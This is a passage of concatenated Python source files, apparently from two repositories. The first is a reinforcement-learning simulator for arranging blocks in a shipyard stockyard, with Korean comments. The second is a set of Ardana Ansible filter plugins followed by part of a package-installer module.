return scipy.signal.lfilter([1], [1, -gamma], x[::-1], axis=0)[::-1]
#Used to initialize weights for policy and value output layers
def normalized_columns_initializer(std=1.0):
def _initializer(shape, dtype=None, partition_info=None):
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
class AC_Network():
def __init__(self, s_size, a_size, scope):
width, height = s_size[0], s_size[1]
s_size = height * width
with tf.variable_scope(scope):
# Input and visual encoding layers
self.inputs = tf.placeholder(shape=[None, s_size], dtype=tf.float32)
self.imageIn = tf.reshape(self.inputs, shape=[-1, height, width, 1])
self.conv1 = slim.conv2d(activation_fn=tf.nn.elu,
inputs=self.imageIn, num_outputs=16,
kernel_size=[2, 2], stride=[1, 1], padding='SAME')
self.conv2 = slim.conv2d(activation_fn=tf.nn.elu,
inputs=self.conv1, num_outputs=32,
kernel_size=[2, 2], stride=[1, 1], padding='SAME')
hidden = slim.fully_connected(slim.flatten(self.conv2), 256, activation_fn=tf.nn.elu)
# Recurrent network for temporal dependencies
lstm_cell = tf.contrib.rnn.BasicLSTMCell(256, state_is_tuple=True)
c_init = np.zeros((1, lstm_cell.state_size.c), np.float32)
h_init = np.zeros((1, lstm_cell.state_size.h), np.float32)
self.state_init = [c_init, h_init]
c_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.c])
h_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.h])
self.state_in = (c_in, h_in)
rnn_in = tf.expand_dims(hidden, [0])
step_size = tf.shape(self.imageIn)[:1]
state_in = tf.contrib.rnn.LSTMStateTuple(c_in, h_in)
lstm_outputs, lstm_state = tf.nn.dynamic_rnn(
lstm_cell, rnn_in, initial_state=state_in, sequence_length=step_size,
time_major=False)
lstm_c, lstm_h = lstm_state
self.state_out = (lstm_c[:1, :], lstm_h[:1, :])
rnn_out = tf.reshape(lstm_outputs, [-1, 256])
# Output layers for policy and value estimations
self.policy = slim.fully_connected(rnn_out, a_size,
activation_fn=tf.nn.softmax,
weights_initializer=normalized_columns_initializer(0.01),
biases_initializer=None)
self.value = slim.fully_connected(rnn_out, 1,
activation_fn=None,
weights_initializer=normalized_columns_initializer(1.0),
biases_initializer=None)
'''
# Only the worker network need ops for loss functions and gradient updating.
if scope != 'global':
self.actions = tf.placeholder(shape=[None], dtype=tf.int32)
self.actions_onehot = tf.one_hot(self.actions, a_size, dtype=tf.float32)
self.target_v = tf.placeholder(shape=[None], dtype=tf.float32)
self.advantages = tf.placeholder(shape=[None], dtype=tf.float32)
self.responsible_outputs = tf.reduce_sum(self.policy * self.actions_onehot, [1])
# Loss functions
self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value, [-1])))
self.entropy = - tf.reduce_sum(self.policy * tf.log(self.policy))
self.policy_loss = -tf.reduce_sum(tf.log(self.responsible_outputs) * self.advantages)
self.loss = 0.5 * self.value_loss + self.policy_loss - self.entropy * 0.01
# Get gradients from local network using local losses
local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)
self.gradients = tf.gradients(self.loss, local_vars)
self.var_norms = tf.global_norm(local_vars)
grads, self.grad_norms = tf.clip_by_global_norm(self.gradients, 40.0)
# Apply local gradients to global network
global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'global')
self.apply_grads = trainer.apply_gradients(zip(grads, global_vars))
'''
class Transporter():
def __init__(self, sess, width, height, a_size=5, mode=0):
self.width = width
self.height = height
s_size = (self.width, self.height)
self.mode = mode
self.name = 'tp'
model_path = '../SavedModels/A3C/%d-%d-%d' % (self.width, self.height, mode)
self.env = {}
self.long_images = []
self.long_counts = []
self.num_move = 0
with tf.device("/cpu:0"):
#global_episodes = tf.Variable(0, dtype=tf.int32, name='global_episodes', trainable=False)
#trainer = tf.train.AdamOptimizer(learning_rate=1e-4)
master_network = AC_Network(s_size, a_size, 'global') # Generate global network
variables = slim.get_variables_to_restore()
variables_to_restore = [v for v in variables if v.name.split('/')[0] == 'global']
saver = tf.train.Saver(variables_to_restore)
print('Loading Model...')
ckpt = tf.train.get_checkpoint_state(model_path)
saver.restore(sess, ckpt.model_checkpoint_path)
self.local_AC = master_network
#self.update_local_ops = update_target_graph('global', self.name)
self.actions = self.actions = np.identity(a_size, dtype=bool).tolist()
self.sess = sess
def get_block_moves(self, blocks, target, name):
#self.env = Space(self.width, self.height, goal=self.mode, block_indices=blocks, target=target, allocation_mode=True)
self.env[name] = Space(self.width, self.height, goal=self.mode, block_indices=blocks, target=target, allocation_mode=True)
env = self.env[name]
self.work(env)
moves = self.env[name].block_moves
blocks = self.env[name].blocks
return moves, blocks
def work(self, env):
sess = self.sess
with sess.as_default(), sess.graph.as_default():
#sess.run(self.update_local_ops)
#episode_buffer = []
#episode_values = []
episode_frames = []
episode_reward = 0
episode_step_count = 0
d = False
#self.env.new_episode()
s = env.get_state()
#s = self.env.get_state().screen_buffer
s = process_frame(s)
s2 = s.reshape([7, 5])
episode_frames.append(s2)
rnn_state = self.local_AC.state_init
self.batch_rnn_state = rnn_state
#while self.env.is_episode_finished() == False:
while d == False:
# Take an action using probabilities from policy network output.
a_dist, v, rnn_state = sess.run(
[self.local_AC.policy, self.local_AC.value, self.local_AC.state_out],
feed_dict={self.local_AC.inputs: [s],
self.local_AC.state_in[0]: rnn_state[0],
self.local_AC.state_in[1]: rnn_state[1]})
a = np.random.choice(a_dist[0], p=a_dist[0])
a = np.argmax(a_dist == a)
#print(s.reshape([3, 4]))
#print(a)
s1, r, d = env.step(a)
if d == False:
#s1 = self.env.get_state().screen_buffer
episode_frames.append(s1)
s1 = process_frame(s1)
else:
s1 = s
#episode_buffer.append([s, a, r, s1, d, v[0, 0]])
#episode_values.append(v[0, 0])
episode_reward += r
s = s1
episode_step_count += 1
if episode_step_count > 1000:
env.block_moves = 100
#print(str(s) + str(len(env.blocks)))
break
if d == True and False:
images = np.array(episode_frames)
self.num_move += env.block_moves
if images.shape[1] != 3:
images = color_frame(images)
big_images = []
for image in images:
big_images.append(scipy.misc.imresize(image, [self.width*30, self.height*30], interp='nearest'))
self.long_images.append(scipy.misc.imresize(image, [self.width*30, self.height*30], interp='nearest'))
self.long_counts.append(self.num_move)
# If the episode hasn't ended, but the experience buffer is full, then we
# make an update step using that experience rollout.
#if len(episode_buffer) == 30 and d != True :
#episode_buffer = []
if d == True:
break
def make_long_gif(self):
time_per_step = 0.1
#make_gif(self.long_images, '../frames/Alloc/%d-%d-%s/image' % (self.width, self.height, '30') + '_long.gif',
# duration=len(self.long_images) * time_per_step, true_image=True, salience=False)
make_gif_with_count(self.long_images, self.long_counts, '../frames/Alloc/%d-%d-%s/image' % (self.width, self.height, '30') + '_long.gif',
duration=len(self.long_images) * time_per_step, true_image=True, salience=False)
self.long_images = []
self.num_move = 0
```
#### File: Block_Stockyard/simulater/Environment.py
```python
from simulater import Block as bl
from simulater import Space as sp
from simulater import DataManager as dm
import numpy as np
import operator
import datetime
import copy
class Environment:
def __init__(self, filepath, width=6, height=4, name='', num_blocks=50):
# 입력 데이터 가져오기 및 멤버변수 저장
space, blocks = dm.import_data(filepath, width, height, num_blocks)
self.NUM_BLOCKS = num_blocks
self.BLOCKS = sorted(blocks, key=operator.attrgetter('_startdate'))
self.height = space.height
self.width = space.width
self.space_name = space.name
self.size = self.height * self.width
self.LOGS = []
self.cumulate = np.zeros([self.width, self.height])
self.name = str(name)
self._initialize()
def _initialize(self):
# episode가 시작될 때 마다 공간 정보를 초기화
self.SPACE = sp.Space(self.width, self.height, self.space_name)
#blocks = dm.generate_blocks(self.NUM_BLOCKS)
#self.BLOCKS = sorted(blocks, key=operator.attrgetter('_startdate'))
self.SPACE.update_blocks(copy.deepcopy(self.BLOCKS))
self.STAGE = 0
def reset(self):
# 환경을 초기화하고 초기 상태를 반환
self._initialize()
status = self.SPACE.get_status(0)
status = np.reshape(status, (1, status.size))
return status
def step(self, action):
blocks = self.SPACE.get_blocks()
num_blocks = len(blocks)
reward = 0
restart = False
'''
#실적 계획을 강제로 넣기 위한 부분
if blocks[self.STAGE].fixed != -1:
action = blocks[self.STAGE].fixed
while self.get_state()[int(action / self.height), int(action % self.height)] != -1.0:
action += 1
if action == 25:
action = 0
'''
x_loc = int(action / self.height)
y_loc = int(action % self.height)
blocks[self.STAGE].set_location(x_loc, y_loc)
#self.SPACE.update_blocks(blocks)
# 블록을 이동하기 전의 normalize하지 않은 상태를 저장해두고 TP이동에 활용
#state = self.SPACE.get_status(max(0, self.STAGE - 1))
# state를 업데이트
is_arrangible, _ = self.SPACE.update_state_lot(self.STAGE)
if is_arrangible:
# InNOutSpace의 좌표가 달라서 y, x로 보내야 함
# r = self.get_reward(state, (y_loc, x_loc))
# r = self.transport_block(state, (y_loc, x_loc))
r = 1
reward += r
self.STAGE += 1
reward += 0
self.LOGS.append(self.SPACE.RESULTS[-1])
rewards = None
if not is_arrangible:
# self._initialize()
reward = -1
restart = True
self.reset()
elif self.STAGE == num_blocks:
restart = True
reward += 3
rewards = self.substep()
self.reset()
# self._initialize()
else:
rewards = self.substep()
status = self.get_state()
return status, reward, restart, rewards
# step 사이에서 반출 블록이 있는지를 체크하고 재배치 수행
def substep(self):
current_day = self.SPACE.event_in[self.STAGE - 1]
next_day = datetime.datetime(datetime.MAXYEAR, 1, 1)
if len(self.SPACE.event_in) != self.STAGE:
next_day = self.SPACE.event_in[self.STAGE]
if current_day == next_day:
return
transfers = []
out_events = sorted(self.SPACE.event_out, key=lambda out: out[0])
for i in range(self.STAGE):
if current_day < out_events[i][0] <= next_day:
transfers.append(out_events[i])
if len(transfers) == 0:
return
current_blocks = []
blocks = self.SPACE.get_blocks()
for block in blocks:
start, end = block.get_schedule()
if start <= current_day < end:
current_blocks.append(block)
rewards = {}
for transfer in transfers:
state = self.SPACE.get_status(max(0, self.STAGE - 1))
x_loc, y_loc = transfer[1].get_location()
r = self.transport_block(state, (x_loc, y_loc), current_blocks)
for i in range(len(blocks)):
if transfer[1].name == blocks[i].name:
rewards[i] = r
return rewards
def get_state(self):
state = self.SPACE.get_status(max(0, self.STAGE - 1))
# state = self.SPACE.RESULTS[-1]
state = self.normalize_state(state, self.STAGE)
return state
def normalize_state(self, state, stage):
norm_state = np.array(state)
blocks = self.SPACE.get_blocks()
if len(blocks) == stage:
stage += -1
duration = blocks[stage].term
for i in range(norm_state.shape[0]):
for j in range(norm_state.shape[1]):
if norm_state[i, j] != -1.0:
norm_state[i, j] = norm_state[i, j] / duration
if norm_state[i, j] >= 3:
norm_state[i, j] = 3.0
return norm_state
def set_transporter(self, transporter):
self.Transporter = transporter
def get_reward(self, state, target):
blocks = []
for i in range(state.shape[0]):
for j in range(state.shape[1]):
if state[i, j] != -1.0:
blocks.append(np.array([j, i]))
moves, _ = self.Transporter.get_block_moves(blocks, target)
reward = max(0, 3 - moves)
return reward
def transport_block(self, state, target, current_blocks):
blocks = []
terms = []
index_curr = []
#terms.append(self.BLOCKS[self.STAGE].term)
index = -1
index_target = -1
for i in range(state.shape[0]):
for j in range(state.shape[1]):
if state[i, j] != -1.0:
index += 1
blocks.append(np.array([i, j]))
terms.append(state[i, j])
if i == target[0] and j == target[1]:
index_target = index
for k in range(len(current_blocks)):
x, y = current_blocks[k].get_location()
if x == i and y == j:
index_curr.append(k)
if index_target == -1:
print('here')
moves, moved_blocks = self.Transporter.get_block_moves(blocks, index_target, self.name)
#moved_blocks.append(moved_blocks.pop(0))
moved_state = np.full(state.shape, -1.0, dtype=float)
try:
for i in range(len(moved_blocks)):
if i == index_target:
continue
current_blocks[index_curr[i]].set_location(moved_blocks[i][0], moved_blocks[i][1])
moved_state[moved_blocks[i][0], moved_blocks[i][1]] = terms[i] - terms[index_target]
self.SPACE.modify_latest_state(moved_state)
self.LOGS.append(self.SPACE.RESULTS[-1])
del current_blocks[index_curr[index_target]]
except:
print('here')
if moves == 0:
reward = 2
else:
reward = max(0, 1/moves)
print(moves)
return reward
```
#### File: Block_Stockyard/simulater/InNOutSpace.py
```python
import numpy as np
import random
class Space:
def __init__(self, width, height, num_block=0, goal=1, block_indices=[], target=-1, allocation_mode=False):
self.width = width
self.height = height
self.grab = -1
self.stage = 0
self.mode = goal
self.goal = goal
#goal이 0인 경우는 블록 반출, 1인 경우는 반입, 2는 랜덤
if goal == 2:
self.goal = random.randint(0, 1)
self.is_grab = False
self.action_space = Action(5)
self.ale = Ale()
self.stopped = 0
self.block_moves = 0
#블록 배치에 연동시에는 아래 값을 True로 사용
self.allocation_mode = allocation_mode
blocks = []
self.num_block=num_block
#블록의 위치가 정해진 경우와 랜덤인 경우를 나눠서 block의 좌표 값을 입력
if type(num_block) is not int:
nblock = random.randint(num_block[0], num_block[1])
block_indices = random.sample(range((width) * height), nblock)
for index in block_indices:
x = index % (width)
y = (int)(index / (width))
blocks.append(np.array([x, y]))
else:
for sample in block_indices:
x, y = sample[0], sample[1]
blocks.append(np.array([x, y]))
#if len(blocks) == 0:
# blocks.append(np.array([-1, -1]))
self.blocks = blocks
self.road = []
for i in range(height):
self.road.append(np.array([width - 1, i]))
self.car = self.road[0]
self.target = target
self.reward = 0
if self.goal == 1:
if allocation_mode:
#배치 모드에서는 타겟이 정해져 있고 도로 위에 타겟 블록을 추가해서 사용
self.target_pos = target
self.blocks.insert(0, self.road[0])
else:
#랜덤 모드에서는 0번째 랜덤 블록 위치를 타겟으로 사용, 타겟 블록은 도로에서 시작
self.target_pos = blocks[0]
self.blocks[0] = self.road[0]
self.grab_block()
self.stage += -1
def get_state(self):
empty = -1
emplty_road = -2
target = 0
normal_block = 1
target_block = 2
normal_ontarget = 3
tp = 4
tp_onblock = 5
tp_onblock_target = 6
tp_carrying = 7
tp_carrying_target = 8
state = np.full([self.height, self.width], empty)
i = 0
#goal=1인 경우는 블록을 반입, 0인 경우는 반출
for road in self.road:
state[road[1], road[0]] = target
if self.goal == 1:
for road in self.road:
state[road[1], road[0]] = emplty_road
state[self.target_pos[1], self.target_pos[0]] = target
for block in self.blocks:
if i == self.target:
state[block[1], block[0]] = target_block
else:
if state[block[1], block[0]] == target:
state[block[1], block[0]] = normal_ontarget
else:
state[block[1], block[0]] = normal_block
i += 1
#블록이 없는 경우
if state[self.car[1], self.car[0]] < normal_block:
state[self.car[1], self.car[0]] = tp
else:
if state[self.car[1], self.car[0]] == normal_block:
if self.is_grab:
state[self.car[1], self.car[0]] = tp_carrying
else:
state[self.car[1], self.car[0]] = tp_onblock
elif state[self.car[1], self.car[0]] == target_block:
if self.is_grab:
state[self.car[1], self.car[0]] = tp_carrying_target
else:
state[self.car[1], self.car[0]] = tp_onblock_target
return state
def is_movable(self, x_change, y_change):
movable = True
x = self.car[0] + x_change
y = self.car[1] + y_change
if x_change==0 and y_change==0:
movable = False
elif abs(x_change) + abs(y_change) > 1:
movable = False
elif x > self.width - 1:
movable =False
elif x < 0:
movable = False
elif y > self.height - 1:
movable = False
elif y < 0:
movable = False
if self.grab > -1:
for block in self.blocks:
if block[0] == x and block[1] ==y:
movable = False
break
return movable
def move_car(self, x_change, y_change):
x = self.car[0] + x_change
y = self.car[1] + y_change
self.car = np.array([x, y])
if self.grab > -1:
self.blocks[self.grab] = np.array([x, y])
self.stage += 1
if self.goal == 0:
for _road in self.road:
if np.array_equal(self.blocks[self.target], _road):
#self.reward = 1
return True
elif self.goal == 1:
if np.array_equal(self.blocks[self.target], self.target_pos):
on_road = False
for i in range(len(self.blocks)):
if i == self.target:
continue
for road in self.road:
if np.array_equal(self.blocks[i], road):
on_road = True
if on_road:
return False
#self.reward = 1
return True
return False
def grab_block(self):
if self.grab != -1:
return
i = 0
for block in self.blocks:
if np.array_equal(block, self.car):
self.grab = i
self.stage += 1
self.is_grab = True
self.block_moves += 1
#if self.grab == 0:
# self.reward = 0.5
return
i += 1
def release_block(self):
if self.grab != -1:
self.grab = -1
self.stage += 1
self.is_grab = False
def step(self, action):
#print(self.get_state())
max_reward = 30
self.reward = 0
x_change = 0
y_change = 0
if action == 0:
y_change += -1
elif action == 1:
y_change += 1
elif action == 2:
x_change += -1
elif action == 3:
x_change += 1
elif action == 4:
if self.is_grab:
self.release_block()
else:
self.grab_block()
terminal = False
if self.is_movable(x_change, y_change):
if self.move_car(x_change, y_change):
#self.reward = max_reward - self.stage
#if self.reward < 10:
# self.reward = 10
self.reward = 1
terminal = True
self.stopped = 0
else:
self.stage += 1
self.stopped += 1
#self.reward += -0.1
state = self.get_state()
reward = self.reward
if self.stopped > 5 and not self.allocation_mode:
terminal = True
#reward = -1
#if self.reward == 1:
#terminal = True
if terminal:
#print(self.block_moves)
#print(self.stage)
if not self.allocation_mode:
self.__init__(self.width, self.height, self.num_block, self.mode, target=self.target)
'''
print(action)
print([x_change, y_change])
print(self.is_grab)
print(state)
print(reward)
print(terminal)
print('*'*30)
'''
return state, reward, terminal
class Action:
def __init__(self, n):
self.n = n
class Ale:
def lives(self):
return 1
```
#### File: Block_Stockyard/simulater/Space.py
```python
import numpy as np
from copy import deepcopy
import datetime
class Space:
def __init__(self, width, height, name):
self.width=width
self.height=height
self.name=name
self.RESULTS=[]
self.status = np.full((self.width, self.height), -1.0, dtype=float)
#공간에 할당된 블록 정보, 투입 및 반출 일정 정보를 업데이트하는 함수
def update_blocks(self, blocks):
events = []
event_in=[]
event_out=[]
for block in blocks:
start, end = block.get_schedule()
events.append(start)
events.append(end)
event_in.append(start)
event_out.append([end, block])
if isinstance(events[0], datetime.date):
self.TIMETYPE = datetime.date
else :
self.TIMETYPE = int
events = list(set(events))
events.sort()
self.EVENTS = events
self._blocks=blocks
self.event_in=event_in
self.event_out=event_out
#좌표 기준으로 블록을 배치하고 reward를 계산하는 함수
def update_status(self, stage):
if stage!=0: #투입 일정 사이에 반출되는 블록을 상태에 반영
self._transfer_blocks(stage)
block=self._blocks[stage]
r=0
block.isin = True
width, height = block.get_dimension()
xloc, yloc = block.get_location()
bounds = self._make_boundary([xloc, yloc], [width, height])
for bound in bounds:
if self.status[bound[0], bound[1]] == 1:
r += 1
for i in range(width):
for j in range(height):
if (xloc + i < self.status.shape[0] and yloc + j < self.status.shape[1]):
self.status[xloc + i, yloc + j] += 1.0
else:
if (i == 0):
yloc += -1
self.status[xloc + i, yloc + j] += 1.0
else:
xloc += -1
self.status[xloc + i, yloc + j] += 1.0
self.RESULTS.append(deepcopy(self.status))
arrangible = True
for a in np.nditer(self.status):
if (a > 1):
arrangible = False
r=0
break
return arrangible, r
#지번 단위로 블록을 배치하고 reward를 계산하는 함수
def update_state_lot(self, stage):
#state = deepcopy(self.get_status(max(0, stage - 1)))
state = np.full((self.width, self.height), -1.0, dtype=float)
current_day = self.event_in[stage]
if self.TIMETYPE is datetime.date:
isdate = True
if stage!=0: #투입 일정 사이에 반출되는 블록을 상태에 반영, 배치된 블록의 남은 일수를 업데이트
#self._transfer_blocks(stage)
'''
term = self.event_in[stage]-self.event_in[stage-1]
if isdate:
term = float(term.days)
for i in range(state.shape[0]):
for j in range(state.shape[1]):
if state[i, j] == 0.0:
state[i, j] = -1.0
elif state[i, j] != -1.0:
state[i, j] -= term
if state[i, j] <= 0.0:
state[i, j] = -1.0
'''
blocks = self.get_blocks()
for i in range(stage):
_block = blocks[i]
_start, _end = _block.get_schedule()
if _start <= current_day < _end:
_x, _y = _block.get_location()
state[_x, _y] = (_end - current_day).days
block = self._blocks[stage]
start, end = block.get_schedule()
untilout = block.term
r=0
block.isin = True
width, height = block.get_dimension()
xloc, yloc = block.get_location()
if state[xloc, yloc] != -1.0:
arrangible=False
state[xloc, yloc] = -2.0
else:
state[xloc, yloc] += untilout+1
arrangible = True
'''
exitside, otherside = self.separate_area(self.status, [xloc, yloc], 1)
for lot in exitside:
if lot<untilout:
r+=1
elif lot>untilout:
r+=-1
for lot in otherside:
if lot<untilout:
r+=-1
elif lot>untilout:
r+=1
'''
# reward는 1,0,-1 중 하나가 되도록 scaling
if r > 0:
#r = int(r/4)+1
r=1
elif r < 0:
#r = int(r/4)-1
r=-1
#Result에서 reward 제거
#self.RESULTS.append([deepcopy(self.status), r])
#temp = np.zeros(self.status.shape)
#np.copyto(temp, self.status)
self.RESULTS.append(state)
return arrangible, r
#space를 location을 기준으로 exit(0,1,2,3) 방향 구역과 반대 방향 구역으로 나눔
def separate_area(self, state, location=[0,0], exit=0):
#출입구의 방향에 따라서 state와 location을 회전
if exit==1:
location = [location[1], state.shape[0]-location[0]-1]
elif exit==2:
location = [state.shape[0]-location[0]-1, state.shape[1]-location[1]-1]
elif exit==3:
location = [state.shape[1] - location[1]-1, location[0]]
state = np.rot90(state, -exit)
exitside=[]
otherside=[]
for i in range(state.shape[0]):
for j in range(state.shape[1]):
if state[i,j] != -1 and j != location[1]:
if j<location[1]:
exitside.append(state[i,j])
else:
otherside.append(state[i,j])
return exitside, otherside
#이전 stage 이후 현 stage 이전의 반출 이벤트를 처리하는 함수
def _transfer_blocks(self, stage):
for day, block in self.event_out:
if day>self.event_in[stage-1] and day<=self.event_in[stage]:
width, height = block.get_dimension()
xloc, yloc = block.get_location()
for i in range(width):
for j in range(height):
if (xloc + i < self.status.shape[0] and yloc + j < self.status.shape[1]):
self.status[xloc + i, yloc + j] = 0.0
else:
if (i == 0):
yloc += -1
self.status[xloc + i, yloc + j] = 0.0
else:
xloc += -1
self.status[xloc + i, yloc + j] = 0.0
#self.RESULTS.append([deepcopy(self.status), 0])
def set_status(self, date):
self.CURRENTDATE = date
status = np.full((self.status.shape[0], self.status.shape[1]), .0, dtype=float)
#status=self.status
for block in self._blocks:
startdate, enddate = block.get_schedule()
if (date >= startdate and date < enddate):
width, height = block.get_dimension()
xloc, yloc = block.get_location()
for i in range(width):
for j in range(height):
if (yloc + j < status.shape[0] and xloc + i < status.shape[1]):
status[yloc + j, xloc + i] += 1.0
else:
if (j == 0):
xloc += -1
status[yloc + j, xloc + i] += 1.0
else:
yloc += -1
status[yloc + j, xloc + i] += 1.0
self.RESULTS.append(status)
arrangible = True
for a in np.nditer(status):
if (a > 1):
arrangible = False
break
return arrangible
def get_status(self, stage):
'''
day=self.event_in[stage]
if (day >= self.EVENTS[-1]):
return self.RESULTS[-1]
for i in range(len(self.EVENTS)-1):
if(self.EVENTS[i]<=day and self.EVENTS[i+1]>day):
index=i
break
if(len(self.RESULTS)==0):
status=np.full((self.width, self.height), -1.0, dtype=float)
else:
if(len(self.RESULTS)<=index):
print('here')
status=self.RESULTS[index]
'''
if (len(self.RESULTS) == 0):
status = np.full((self.width, self.height), -1.0, dtype=float)
else:
status = self.RESULTS[stage]
return status
def get_blocks(self):
return self._blocks
def _make_boundary(self, location, size):
bounds=[]
if location[1] != 0:
for i in range(size[0]):
if location[0] + i< self.width:
bounds.append([location[0]+i, location[1]-1])
if location[0] + size[0] < self.width:
for i in range(size[1]):
if location[1] + i <self.height:
bounds.append([location[0] + size[0], location[1]+i])
if location[1] + size[1] < self.height:
for i in range(size[0]):
if location[0] + i < self.width:
bounds.append([location[0]+i, location[1] + size[1]])
if location[0] != 0:
for i in range(size[1]):
if location[1] + i < self.height:
bounds.append([location[0]-1, location[1]+i])
return bounds
def modify_latest_state(self, new_state):
if len(self.RESULTS) > 0:
self.RESULTS[-1] = new_state
```
#### File: Block_Stockyard/view/ArrayView.py
```python
import matplotlib.pyplot as plt
import numpy as np
import simulater.DataManager as dm
def visualize_space(Statuses):
Days=range(len(Statuses))
fig = plt.figure(figsize=(10, 5))
for i in range(len(Statuses)):
ax = fig.add_subplot(1, len(Statuses)/1+1, i+1)
#_label=Names[i]+'('+str(Labels[i])+')'
ax.set_title(Days[i], fontsize='20', x=0.5, y=1.0)
plt.imshow(Statuses[i], vmin=0, vmax=1)
#plt.figimage(Statuses[i])
ax.axes.get_xaxis().set_visible(False)
ax.axes.get_yaxis().set_visible(False)
#ax.set_aspect('equal')
#색 기준 축 입력
'''
cax = fig.add_axes([0.12, 0.1, 0.95, 0.8])
cax.get_xaxis().set_visible(False)
cax.get_yaxis().set_visible(False)
#cax.patch.set_alpha(1)
cax.set_frame_on(False)
'''
#plt.colorbar(orientation='vertical')
plt.show()
def visualize_log(logs, cumulate):
max_logs = 1
num_logs = len(logs)
num_status = len(logs[0]) - 1
'''
cumulate = np.zeros([logs[0][0][0].shape[0], logs[0][0][0].shape[1]])
for i in range(num_logs):
for j in range(num_status):
cumulate += logs[i][j][0]
'''
if num_logs>max_logs:
num_logs=max_logs
logs=logs[0:max_logs]
fig = plt.figure(figsize=(15, 15))
for i in range(num_logs):
for j in range(num_status):
#ax = fig.add_subplot(num_logs, num_status, num_status*i+j+1)
ax = fig.add_subplot(max_logs*5, num_status/5, 50*i+j + 1)
#_label=Names[i]+'('+str(Labels[i])+')'
ax.set_title(str(logs[i][j][1]), fontsize='7', x=0.5, y=0.88)
plt.imshow(logs[i][j][0], vmin=-1, vmax=logs[i][j][0].max())
#plt.figimage(Statuses[i])
ax.axes.get_xaxis().set_visible(False)
ax.axes.get_yaxis().set_visible(False)
fig.savefig('../data/arrangement.png')
dm.export_2darray_csv(cumulate, '../data/result.csv')
print ('Reward of arrangement: ' + str(logs[0][-1]))
#ax.set_aspect('equal')
#색 기준 축 입력
'''
cax = fig.add_axes([0.12, 0.1, 0.95, 0.8])
cax.get_xaxis().set_visible(False)
cax.get_yaxis().set_visible(False)
#cax.patch.set_alpha(1)
cax.set_frame_on(False)
'''
#plt.colorbar(orientation='vertical')
plt.show()
``` |
{
"source": "jjolly/ardana-dev-tools",
"score": 2
} |
#### File: ansible/filter_plugins/collection_filters.py
```python
import itertools
import jinja2.runtime as jrt
def do_flatten(lists):
"""Flatten multiple lists
Takes a list of lists and returns a single list of the contents.
"""
for item in itertools.chain.from_iterable(lists):
yield item
def do_reduce(collection, *args, **kwargs):
"""Extract multi-level attributes from collection
Return a generator of the results from the given attributes in the
provided collection.
So for multiple dictionaries such as:
collection = [
{'attr': {'data': 1}},
{'attr': {'data': 2}},
{'attr': {'data': 3}}
}
so `do_reduce(collection, 'attr', 'data')` yields `1, 2, 3`
"""
default = kwargs.get('d', jrt.StrictUndefined())
default = kwargs.get('default', default)
for item in collection:
try:
yield reduce(type(item).__getitem__, args, item)
except (KeyError, TypeError):
if not isinstance(default, jrt.StrictUndefined):
yield default
def do_collect(collection, needles):
for item in needles:
try:
yield collection[item]
except KeyError:
pass
class FilterModule(object):
def filters(self):
return {'flatten': do_flatten,
'collect': do_collect,
'reduce': do_reduce}
```
#### File: ansible/filter_plugins/extract_dicts_filter.py
```python
def extract_dicts(data):
output = {}
for value in data:
if type(value) is dict:
output.update(value)
return output
class FilterModule(object):
def filters(self):
return {'extract_dicts': extract_dicts}
```
#### File: ansible/filter_plugins/find_deps_filter.py
```python
def find_deps(services):
output = set()
for service in services.values():
for dep in service.get("deps", []):
output.add(dep)
return list(output)
class FilterModule(object):
def filters(self):
return {'find_deps': find_deps}
```
#### File: ansible/filter_plugins/version_compare_smart.py
```python
import operator as py_operator
import pkg_resources
from ansible import errors
def version_compare_smart(value, version, operator='eq'):
'''Perform a version comparison on a value'''
op_map = {
'==': 'eq', '=': 'eq', 'eq': 'eq',
'<': 'lt', 'lt': 'lt',
'<=': 'le', 'le': 'le',
'>': 'gt', 'gt': 'gt',
'>=': 'ge', 'ge': 'ge',
'!=': 'ne', '<>': 'ne', 'ne': 'ne'
}
if operator in op_map:
operator = op_map[operator]
else:
raise errors.AnsibleFilterError('Invalid operator type')
try:
method = getattr(py_operator, operator)
return method(pkg_resources.parse_version(value),
pkg_resources.parse_version(version))
except Exception as e:
raise errors.AnsibleFilterError('Version comparison: %s' % e)
class FilterModule(object):
def filters(self):
return {
"version_compare_smart": version_compare_smart
}
```
#### File: packager/ardana_packager/cmd.py
```python
import json
import six
import sys
import ardana_packager.activate as activate
import ardana_packager.ansible as ansible
import ardana_packager.cache as cache
import ardana_packager.config as config
from ardana_packager.error import InstallerError
import ardana_packager.expand as expand
import ardana_packager.service as service
from ardana_packager.version import Spec
def main():
# This must be called from a module with WANT_JSON specified
with open(sys.argv[1]) as f:
params = {'state': None,
'name': None,
'group': 'root',
'extra_mode_bits': '000',
'service': None,
'version': config.VERSION_LATEST,
'suffix': None,
'cache': None,
'clean': False,
'activate': None,
}
params.update(json.load(f))
# We make an "empty" module as the ansible module doesn't
# have bare fail_json, etc, functions.
module = ansible.AnsibleModule(argument_spec={}, args=[])
state = params['state']
assert state in ('present', 'absent', None)
name = params['name']
group_name = params['group']
extra_mode_bits = int(params['extra_mode_bits'], 8)
service_name = params['service']
version = params['version']
suffix = params['suffix']
cache_op = params['cache']
assert cache_op in ('update', None)
clean = params['clean']
activate = params['activate']
assert activate in ('act_on', 'act_off', None)
# Backward-compatible argument munging: sometimes "version"
# really means "suffix".
if isinstance(version, dict):
assert version['v'] == 1
if suffix is None:
suffix = version['suffix']
version = version['version']
elif activate == 'act_on' and state is None:
if suffix is None and isinstance(version, six.string_types):
# Use the suffix
suffix = version
version = None
if activate is None:
activate = 'act_on'
spec = Spec(package=name, service=service_name,
version=version, suffix=suffix)
conf = config.Config(group_name=group_name,
extra_mode_bits=extra_mode_bits)
# For the moment ...
# TODO(jan) break this out into a class that can control it all.
changed = False
if cache_op == "update":
try:
changed = cache.update(conf) or changed
except Exception as e:
module.fail_json(msg="Installation failed",
name=name,
group=group_name,
extra_mode_bits=extra_mode_bits,
service=service_name,
version=_report_version(version),
exception=str(e))
return
elif state == "present":
try:
(changed_ret, spec) = install(spec, conf)
changed = changed or changed_ret
except InstallerError as e:
module.fail_json(msg="Installation failed",
name=name,
group=group_name,
extra_mode_bits=extra_mode_bits,
service=service_name,
version=_report_version(spec.version),
exception=str(e))
return
elif state == "absent":
try:
(changed_ret, spec) = uninstall(spec, conf)
